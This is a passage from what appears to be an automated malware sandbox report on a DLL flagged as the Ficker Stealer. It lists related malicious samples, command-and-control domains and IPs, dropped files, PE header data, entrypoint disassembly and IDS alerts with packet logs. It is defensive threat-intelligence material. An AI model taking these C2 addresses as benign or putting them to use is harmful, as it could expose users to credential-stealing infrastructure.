                              • api.ipify.org/?format=xml
                              file.dllGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              23.21.224.49file.docGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              niberius.dllGet hashmaliciousBrowse
                              • api.ipify.org/
                              nimb.dllGet hashmaliciousBrowse
                              • api.ipify.org/
                              file.docGet hashmaliciousBrowse
                              • api.ipify.org/
                              kiks.dllGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              file.dllGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              triage_dropped_file.dllGet hashmaliciousBrowse
                              • api.ipify.org/
                              77.222.42.670708_3355614568218.docGet hashmaliciousBrowse
                              • sudepallon.com/8/forum.php
                              triage_dropped_file.dllGet hashmaliciousBrowse
                              • sudepallon.com/8/forum.php
                              08.jpg.exeGet hashmaliciousBrowse
                              • sudepallon.com/8/forum.php
                              0708_5355150121.xllGet hashmaliciousBrowse
                              • sudepallon.com/8/forum.php
                              triage_dropped_file.dllGet hashmaliciousBrowse
                              • mancause.ru/8/forum.php
                              nimb.dllGet hashmaliciousBrowse
                              • mancause.ru/8/forum.php
                              0706_1050501748839.docGet hashmaliciousBrowse
                              • mancause.ru/8/forum.php
                              file.dllGet hashmaliciousBrowse
                              • mancause.ru/8/forum.php
                              file.docGet hashmaliciousBrowse
                              • mancause.ru/8/forum.php
                              file.docGet hashmaliciousBrowse
                              • mancause.ru/8/forum.php
                              file.dllGet hashmaliciousBrowse
                              • mancause.ru/8/forum.php
                              file.docGet hashmaliciousBrowse
                              • mancause.ru/8/forum.php

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              elb097307-934924932.us-east-1.elb.amazonaws.com0708_3355614568218.docGet hashmaliciousBrowse
                              • 50.19.92.227
                              RUxuwqYQMM.exeGet hashmaliciousBrowse
                              • 54.235.88.121
                              1R1aRTRnis.exeGet hashmaliciousBrowse
                              • 54.243.175.83
                              triage_dropped_file.dllGet hashmaliciousBrowse
                              • 54.225.78.40
                              08.jpg.exeGet hashmaliciousBrowse
                              • 50.19.92.227
                              0708_5355150121.xllGet hashmaliciousBrowse
                              • 23.21.173.155
                              OTzccW5OZg.exeGet hashmaliciousBrowse
                              • 50.16.226.23
                              ve88CBNzQZ.dllGet hashmaliciousBrowse
                              • 50.16.216.118
                              triage_dropped_file.dllGet hashmaliciousBrowse
                              • 54.235.175.90
                              nimb.dllGet hashmaliciousBrowse
                              • 50.16.216.118
                              0706_1050501748839.docGet hashmaliciousBrowse
                              • 50.16.216.118
                              file.dllGet hashmaliciousBrowse
                              • 23.21.136.132
                              file.docGet hashmaliciousBrowse
                              • 23.21.211.162
                              file.docGet hashmaliciousBrowse
                              • 23.21.136.132
                              file.dllGet hashmaliciousBrowse
                              • 54.235.121.178
                              file.docGet hashmaliciousBrowse
                              • 50.16.246.238
                              0706_1715044809783.docGet hashmaliciousBrowse
                              • 54.235.175.90
                              niberius.dllGet hashmaliciousBrowse
                              • 50.16.218.217
                              nimb.dllGet hashmaliciousBrowse
                              • 54.225.78.40
                              4h2yLkN8DO.dllGet hashmaliciousBrowse
                              • 23.23.104.250
                              srand04rf.ru0708_3355614568218.docGet hashmaliciousBrowse
                              • 8.211.241.0
                              triage_dropped_file.dllGet hashmaliciousBrowse
                              • 8.211.241.0
                              0708_5355150121.xllGet hashmaliciousBrowse
                              • 8.211.241.0
                              aCWkTdaR6G.dllGet hashmaliciousBrowse
                              • 8.209.119.208
                              0616_433887484261.docGet hashmaliciousBrowse
                              • 8.209.119.208
                              omsh.dllGet hashmaliciousBrowse
                              • 8.209.119.208
                              omsh_.dllGet hashmaliciousBrowse
                              • 8.209.119.208
                              omh.dllGet hashmaliciousBrowse
                              • 8.209.119.208
                              0616_1338797754728.docGet hashmaliciousBrowse
                              • 8.209.119.208
                              pospvisis.com0708_3355614568218.docGet hashmaliciousBrowse
                              • 95.213.179.67
                              triage_dropped_file.dllGet hashmaliciousBrowse
                              • 95.213.179.67
                              nimb.dllGet hashmaliciousBrowse
                              • 95.213.179.67
                              0706_1050501748839.docGet hashmaliciousBrowse
                              • 95.213.179.67
                              file.dllGet hashmaliciousBrowse
                              • 95.213.179.67
                              file.docGet hashmaliciousBrowse
                              • 95.213.179.67
                              file.docGet hashmaliciousBrowse
                              • 95.213.179.67
                              file.dllGet hashmaliciousBrowse
                              • 95.213.179.67
                              file.docGet hashmaliciousBrowse
                              • 95.213.179.67
                              0706_1715044809783.docGet hashmaliciousBrowse
                              • 95.213.179.67
                              niberius.dllGet hashmaliciousBrowse
                              • 95.213.179.67
                              niberius.dllGet hashmaliciousBrowse
                              • 95.213.179.67
                              0701_1866962341645.docGet hashmaliciousBrowse
                              • 95.213.179.67
                              file.dllGet hashmaliciousBrowse
                              • 95.213.179.67
                              file.dllGet hashmaliciousBrowse
                              • 95.213.179.67
                              file.dllGet hashmaliciousBrowse
                              • 95.213.179.67
                              file.dllGet hashmaliciousBrowse
                              • 95.213.179.67
                              file.dllGet hashmaliciousBrowse
                              • 95.213.179.67
                              file.dllGet hashmaliciousBrowse
                              • 95.213.179.67
                              file.dllGet hashmaliciousBrowse
                              • 95.213.179.67

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              AMAZON-AESUS0708_3355614568218.docGet hashmaliciousBrowse
                              • 23.21.211.162
                              RUxuwqYQMM.exeGet hashmaliciousBrowse
                              • 54.235.88.121
                              1R1aRTRnis.exeGet hashmaliciousBrowse
                              • 23.21.224.49
                              triage_dropped_file.dllGet hashmaliciousBrowse
                              • 54.235.121.178
                              paskoocheh-android.apkGet hashmaliciousBrowse
                              • 50.17.170.49
                              paskoocheh-android.apkGet hashmaliciousBrowse
                              • 34.225.210.187
                              08.jpg.exeGet hashmaliciousBrowse
                              • 50.19.92.227
                              0708_5355150121.xllGet hashmaliciousBrowse
                              • 23.21.173.155
                              OTzccW5OZg.exeGet hashmaliciousBrowse
                              • 50.16.216.118
                              ve88CBNzQZ.dllGet hashmaliciousBrowse
                              • 50.16.216.118
                              FQ4jzOGrg6udVQoV9d7S.exeGet hashmaliciousBrowse
                              • 3.223.125.168
                              FQ4jzOGrg6udVQoV9d7S.exeGet hashmaliciousBrowse
                              • 3.223.125.168
                              triage_dropped_file.dllGet hashmaliciousBrowse
                              • 54.225.245.108
                              nimb.dllGet hashmaliciousBrowse
                              • 54.235.175.90
                              0706_1050501748839.docGet hashmaliciousBrowse
                              • 50.16.216.118
                              file.dllGet hashmaliciousBrowse
                              • 50.16.220.248
                              file.docGet hashmaliciousBrowse
                              • 23.21.173.155
                              file.docGet hashmaliciousBrowse
                              • 50.16.246.238
                              file.dllGet hashmaliciousBrowse
                              • 54.225.245.108
                              file.docGet hashmaliciousBrowse
                              • 50.16.246.238
                              SWEB-ASRU0708_3355614568218.docGet hashmaliciousBrowse
                              • 77.222.42.67
                              triage_dropped_file.dllGet hashmaliciousBrowse
                              • 77.222.42.67
                              08.jpg.exeGet hashmaliciousBrowse
                              • 77.222.42.67
                              0708_5355150121.xllGet hashmaliciousBrowse
                              • 77.222.42.67
                              triage_dropped_file.dllGet hashmaliciousBrowse
                              • 77.222.42.67
                              nimb.dllGet hashmaliciousBrowse
                              • 77.222.42.67
                              0706_1050501748839.docGet hashmaliciousBrowse
                              • 77.222.42.67
                              file.dllGet hashmaliciousBrowse
                              • 77.222.42.67
                              file.docGet hashmaliciousBrowse
                              • 77.222.42.67
                              file.docGet hashmaliciousBrowse
                              • 77.222.42.67
                              file.dllGet hashmaliciousBrowse
                              • 77.222.42.67
                              file.docGet hashmaliciousBrowse
                              • 77.222.42.67
                              jax.k.dllGet hashmaliciousBrowse
                              • 77.222.52.246
                              0526_28522894410229.docGet hashmaliciousBrowse
                              • 77.222.52.246
                              0526_1488782409783.docGet hashmaliciousBrowse
                              • 77.222.52.246
                              0526_17568640710485.docGet hashmaliciousBrowse
                              • 77.222.52.246
                              0526_4618771472215.docGet hashmaliciousBrowse
                              • 77.222.52.246
                              0526_1488782409783.docGet hashmaliciousBrowse
                              • 77.222.52.246
                              jax.k.dllGet hashmaliciousBrowse
                              • 77.222.52.246
                              180000.dllGet hashmaliciousBrowse
                              • 77.222.52.246
                              AMAZON-AESUS0708_3355614568218.docGet hashmaliciousBrowse
                              • 23.21.211.162
                              RUxuwqYQMM.exeGet hashmaliciousBrowse
                              • 54.235.88.121
                              1R1aRTRnis.exeGet hashmaliciousBrowse
                              • 23.21.224.49
                              triage_dropped_file.dllGet hashmaliciousBrowse
                              • 54.235.121.178
                              paskoocheh-android.apkGet hashmaliciousBrowse
                              • 50.17.170.49
                              paskoocheh-android.apkGet hashmaliciousBrowse
                              • 34.225.210.187
                              08.jpg.exeGet hashmaliciousBrowse
                              • 50.19.92.227
                              0708_5355150121.xllGet hashmaliciousBrowse
                              • 23.21.173.155
                              OTzccW5OZg.exeGet hashmaliciousBrowse
                              • 50.16.216.118
                              ve88CBNzQZ.dllGet hashmaliciousBrowse
                              • 50.16.216.118
                              FQ4jzOGrg6udVQoV9d7S.exeGet hashmaliciousBrowse
                              • 3.223.125.168
                              FQ4jzOGrg6udVQoV9d7S.exeGet hashmaliciousBrowse
                              • 3.223.125.168
                              triage_dropped_file.dllGet hashmaliciousBrowse
                              • 54.225.245.108
                              nimb.dllGet hashmaliciousBrowse
                              • 54.235.175.90
                              0706_1050501748839.docGet hashmaliciousBrowse
                              • 50.16.216.118
                              file.dllGet hashmaliciousBrowse
                              • 50.16.220.248
                              file.docGet hashmaliciousBrowse
                              • 23.21.173.155
                              file.docGet hashmaliciousBrowse
                              • 50.16.246.238
                              file.dllGet hashmaliciousBrowse
                              • 54.225.245.108
                              file.docGet hashmaliciousBrowse
                              • 50.16.246.238

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\ProgramData\kaosdma.txt
                              Process:C:\Windows\SysWOW64\svchost.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):14
                              Entropy (8bit):2.699513850319966
                              Encrypted:false
                              SSDEEP:3:EQgNQVLSV:EQgNAi
                              MD5:A1924933759C1451D5C265A1AAE417BB
                              SHA1:51E332B10F8DF35EC6CFE0F19BBFA1C1BA26C7EF
                              SHA-256:14B234DD8C929349B23088908C14E02574760F839DE8A88574D7D4F70AFFD02F
                              SHA-512:4D0DD0054634B744F7EDCFFEDB17E17FCB6B4D7B269BD6F23CB6275802D0AF42CC0460AFAF9D3539E23B0EA9673A7DBA30FF35AFAED68BDF86B3EBE15C9DF3F5
                              Malicious:false
                              Reputation:low
                              Preview: 185.189.150.70
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\RCR7H9R6.txt
                              Process:C:\Windows\SysWOW64\svchost.exe
                              File Type:ASCII text, with no line terminators
                              Category:downloaded
                              Size (bytes):14
                              Entropy (8bit):2.699513850319966
                              Encrypted:false
                              SSDEEP:3:EQgNQVLSV:EQgNAi
                              MD5:A1924933759C1451D5C265A1AAE417BB
                              SHA1:51E332B10F8DF35EC6CFE0F19BBFA1C1BA26C7EF
                              SHA-256:14B234DD8C929349B23088908C14E02574760F839DE8A88574D7D4F70AFFD02F
                              SHA-512:4D0DD0054634B744F7EDCFFEDB17E17FCB6B4D7B269BD6F23CB6275802D0AF42CC0460AFAF9D3539E23B0EA9673A7DBA30FF35AFAED68BDF86B3EBE15C9DF3F5
                              Malicious:false
                              IE Cache URL:http://api.ipify.org/?format=xml
                              Preview: 185.189.150.70

                              Static File Info

                              General

                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.490962289954401
                              TrID:
                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                              • Generic Win/DOS Executable (2004/3) 0.20%
                              • DOS Executable Generic (2002/1) 0.20%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:niberius.dll
                              File size:274432
                              MD5:d22d8bb38cf8d6a5ce6d8be4106350e7
                              SHA1:02fc51e6572a17f5dbbc32c4e3dd03cca3c51afe
                              SHA256:4dc9d5ee1debdba0388fbb112d4bbbc01bb782f015e798cced3fc2edb17ac557
                              SHA512:434e6b553bb96c5ae6b26d22cc35614f248f93a442e702395ce925578598bdf74eb884daf5a40d6c02cb1769eaf3dfdf858205e0c7b64f8afda38574991fcc41
                              SSDEEP:3072:c+dVxycTZ+1ohyeQB7qZDZtOet+vWEY+mq2MBcCWBM0NYgJKUFfn+rY+FYs:c+HZ+10yjBOtdt+vW/q2UINHJK5dYs
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+...+...+....o..=....o......"... ...+..._....o.......o..*....o..*....o..*...Rich+...........PE..L....D.D...........!.......

                              File Icon

                              Icon Hash:74f0e4ecccdce0e4

                              Static PE Info

                              General

                              Entrypoint:0x101b829
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x1000000
                              Subsystem:windows gui
                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                              DLL Characteristics:
                              Time Stamp:0x44AE44FC [Fri Jul 7 11:26:52 2006 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:7c563cc34a5ec19fda679d5f10cd6773

                              Entrypoint Preview

                              Instruction
                              cmp dword ptr [esp+08h], 01h
                              jne 00007FA1D8879557h
                              call 00007FA1D8882F76h
                              push dword ptr [esp+04h]
                              mov ecx, dword ptr [esp+10h]
                              mov edx, dword ptr [esp+0Ch]
                              call 00007FA1D8879442h
                              pop ecx
                              retn 000Ch
                              push eax
                              push dword ptr fs:[00000000h]
                              lea eax, dword ptr [esp+0Ch]
                              sub esp, dword ptr [esp+0Ch]
                              push ebx
                              push esi
                              push edi
                              mov dword ptr [eax], ebp
                              mov ebp, eax
                              mov eax, dword ptr [0103C470h]
                              xor eax, ebp
                              push eax
                              push dword ptr [ebp-04h]
                              mov dword ptr [ebp-04h], FFFFFFFFh
                              lea eax, dword ptr [ebp-0Ch]
                              mov dword ptr fs:[00000000h], eax
                              ret
                              push eax
                              push dword ptr fs:[00000000h]
                              lea eax, dword ptr [esp+0Ch]
                              sub esp, dword ptr [esp+0Ch]
                              push ebx
                              push esi
                              push edi
                              mov dword ptr [eax], ebp
                              mov ebp, eax
                              mov eax, dword ptr [0103C470h]
                              xor eax, ebp
                              push eax
                              mov dword ptr [ebp-10h], esp
                              push dword ptr [ebp-04h]
                              mov dword ptr [ebp-04h], FFFFFFFFh
                              lea eax, dword ptr [ebp-0Ch]
                              mov dword ptr fs:[00000000h], eax
                              ret
                              push eax
                              push dword ptr fs:[00000000h]
                              lea eax, dword ptr [esp+0Ch]
                              sub esp, dword ptr [esp+0Ch]
                              push ebx
                              push esi
                              push edi
                              mov dword ptr [eax], ebp
                              mov ebp, eax
                              mov eax, dword ptr [0103C470h]
                              xor eax, ebp
                              push eax
                              mov dword ptr [ebp-10h], eax
                              push dword ptr [ebp-04h]
                              mov dword ptr [ebp-04h], FFFFFFFFh
                              lea eax, dword ptr [ebp-0Ch]
                              mov dword ptr fs:[00000000h], eax
                              ret
                              mov ecx, dword ptr [ebp-0Ch]
                              mov dword ptr fs:[00000000h], ecx

                              Rich Headers

                              Programming Language:
                              • [RES] VS2005 build 50727
                              • [ C ] VS2005 build 50727
                              • [C++] VS2005 build 50727
                              • [EXP] VS2005 build 50727
                              • [ASM] VS2005 build 50727
                              • [LNK] VS2005 build 50727
                              • [IMP] VS2008 SP1 build 30729

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x3b0100x82.rdata
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3a62c0x78.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xdd0000xb20.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xde0000x25c8.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x2d2400x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x38cd00x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x2d0000x1b8.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x2b69d0x2c000False0.584927645597data6.64614943801IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rdata0x2d0000xe0920xf000False0.571858723958data5.90297265035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x3c0000xa00280x2000False0.262817382812data3.18088743735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .rsrc0xdd0000xb200x1000False0.271240234375data2.68221673058IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xde0000x372e0x4000False0.481750488281data4.87419588787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountry
                              RT_DIALOG0xdd1f00x130dataEnglishUnited States
                              RT_DIALOG0xdd3200xb8dataEnglishUnited States
                              RT_DIALOG0xdd3d80x124dataEnglishUnited States
                              RT_DIALOG0xdd5000xf6dataEnglishUnited States
                              RT_DIALOG0xdd5f80xbcdataEnglishUnited States
                              RT_DIALOG0xdd6b80xf0dataEnglishUnited States
                              RT_DIALOG0xdd7a80xc8dataEnglishUnited States
                              RT_DIALOG0xdd8700x130dataEnglishUnited States
                              RT_MANIFEST0xdd9a00x17dXML 1.0 document textEnglishUnited States

                              Imports

                              DLLImport
                              KERNEL32.dllCreateProcessA, GetSystemDirectoryA, VirtualProtect, GetCurrentDirectoryA, GetTempPathA, SetConsoleCP, GetModuleFileNameA, GetEnvironmentVariableA, GetModuleHandleA, SetFileAttributesA, CreateFileA, GetLocaleInfoW, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, ReadFile, LoadLibraryA, FormatMessageA, GetSystemTimeAsFileTime, SetSystemPowerState, GetProcessHeap, HeapSize, CloseHandle, SetFilePointer, FlushFileBuffers, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, Sleep, InterlockedExchange, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, MultiByteToWideChar, GetLastError, HeapReAlloc, HeapAlloc, HeapFree, RtlUnwind, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCurrentThreadId, GetCommandLineA, GetVersionExA, GetCPInfo, LCMapStringA, LCMapStringW, GetACP, GetOEMCP, GetProcAddress, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, ExitProcess, WriteFile, GetStdHandle, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, GetStringTypeA, GetStringTypeW, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetConsoleCP, GetConsoleMode
                              USER32.dllValidateRect, PostMessageA, InvalidateRect, BeginPaint, DestroyMenu, GetSystemMetrics, MapWindowPoints
                              ole32.dllCoInitialize, CoTaskMemAlloc, CoTaskMemFree, CoUninitialize
                              ADVAPI32.dllRegCloseKey, RegCreateKeyA, RegOpenKeyExA, RegQueryValueExW
                              UxTheme.dllOpenThemeData, GetThemeTextExtent, CloseThemeData

                              Exports

                              NameOrdinalAddress
                              Exercisefound10x1011530
                              Forwardlow20x1012b80
                              More30x1012940
                              Overhuge40x1012800

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Snort IDS Alerts

                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              07/09/21-03:11:21.366039TCP2031074ET TROJAN Win32/Ficker Stealer Activity804972795.213.179.67192.168.2.3
                              07/09/21-03:11:21.368458TCP2031132ET TROJAN Win32/Ficker Stealer Activity M34972780192.168.2.395.213.179.67
                              07/09/21-03:11:23.363477ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                              07/09/21-03:11:56.225914TCP2031074ET TROJAN Win32/Ficker Stealer Activity804978895.213.179.67192.168.2.3
                              07/09/21-03:11:56.226309TCP2031132ET TROJAN Win32/Ficker Stealer Activity M34978880192.168.2.395.213.179.67

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jul 9, 2021 03:11:13.005009890 CEST4971880192.168.2.323.21.173.155
                              Jul 9, 2021 03:11:13.106026888 CEST804971823.21.173.155192.168.2.3
                              Jul 9, 2021 03:11:13.122771025 CEST4971880192.168.2.323.21.173.155
                              Jul 9, 2021 03:11:13.153486013 CEST4971880192.168.2.323.21.173.155
                              Jul 9, 2021 03:11:13.255074024 CEST804971823.21.173.155192.168.2.3
                              Jul 9, 2021 03:11:13.257200956 CEST804971823.21.173.155192.168.2.3
                              Jul 9, 2021 03:11:13.263669014 CEST4971880192.168.2.323.21.173.155
                              Jul 9, 2021 03:11:13.891632080 CEST4971980192.168.2.377.222.42.67
                              Jul 9, 2021 03:11:13.944201946 CEST804971977.222.42.67192.168.2.3
                              Jul 9, 2021 03:11:13.958690882 CEST4971980192.168.2.377.222.42.67
                              Jul 9, 2021 03:11:13.969963074 CEST4971980192.168.2.377.222.42.67
                              Jul 9, 2021 03:11:14.022344112 CEST804971977.222.42.67192.168.2.3
                              Jul 9, 2021 03:11:14.041244984 CEST804971977.222.42.67192.168.2.3
                              Jul 9, 2021 03:11:14.049395084 CEST4971980192.168.2.377.222.42.67
                              Jul 9, 2021 03:11:14.836204052 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:14.871048927 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:14.875448942 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:14.898063898 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:14.935054064 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.057348013 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.057378054 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.057389975 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.057441950 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.057461977 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.057634115 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.057656050 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.057672977 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.057689905 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.057837963 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.073647022 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.074754953 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.108932018 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.108987093 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.109025002 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.109062910 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.109152079 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.109174013 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.109179974 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110023975 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110070944 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110110044 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110142946 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110187054 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110229969 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110285997 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110331059 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110369921 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110407114 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110455990 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110502958 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110541105 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110570908 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110599995 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110616922 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110639095 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.110640049 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110645056 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110649109 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110652924 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110657930 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110661030 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110665083 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110668898 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110671997 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110676050 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110680103 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110683918 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.110727072 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.144594908 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.144644976 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.144694090 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.144715071 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.144922972 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.144963026 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.144965887 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.144994020 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.144996881 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.145032883 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.145057917 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.145088911 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.145092010 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.145123959 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.145145893 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.145206928 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.146111965 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.146147013 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.146167040 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.146177053 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.146200895 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.146207094 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.146239042 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.146245956 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.146260977 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.146287918 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.146377087 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.146411896 CEST80497208.211.241.0192.168.2.3
                              Jul 9, 2021 03:11:15.146428108 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.146430969 CEST80497208.211.241.0192.168.2.3
